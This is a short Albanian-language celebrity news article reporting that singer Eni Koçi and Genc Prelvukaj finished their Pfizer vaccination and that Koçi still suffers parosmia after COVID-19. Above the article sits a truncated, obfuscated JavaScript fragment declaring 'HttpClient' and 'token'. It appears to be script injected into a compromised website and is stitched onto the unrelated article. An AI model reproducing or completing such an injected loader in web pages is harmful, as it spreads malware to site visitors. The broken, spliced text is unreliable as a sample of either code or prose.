;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Këngëtarja shqiptare përfundon vaksinimin, pas një viti ajo akoma vuan pasojat e COVID-19

By

Para pak ditësh, çifti Eni Koçi dhe Genc Prelvukaj përfunduan me dy dozat e vaksinës.

Çifti po ashtu bën thirrje tek ndjekësit e tyre që të tregoheshin të përgjegjshëm dhe të inokuloheshin kundër virusit vdekjeprurës.

“Unë dhe tmerri nga gjilpërat. Unë zgjodha vaksinën Pfizer. Ju sugjeroj të ecni me hapin e shkencës dhe të bëni vaksinën. Duhen injoruar plotësisht teoritë e gabuara që kundërshtojnë marrjen e vaksinës.“, shkruante Eni në postimin e saj.

Këngëtarja kishte rezultuar pozitive me COVID-19 para rreth një viti, mirëpo ajo akoma vuan pasojat e virusit.

Në një bisedë që ajo realizoi me ndjekësit e saj në Instagram, Eni ndau edhe eksperiencën e saj me COVID-19.

“Ende vuaj pasojat me shijen dhe nuhatjen (parosmia)”, ka shkruar Eni teksa i përgjigjet një ndjekësi. /prive.al

Artikuj të ngjashëm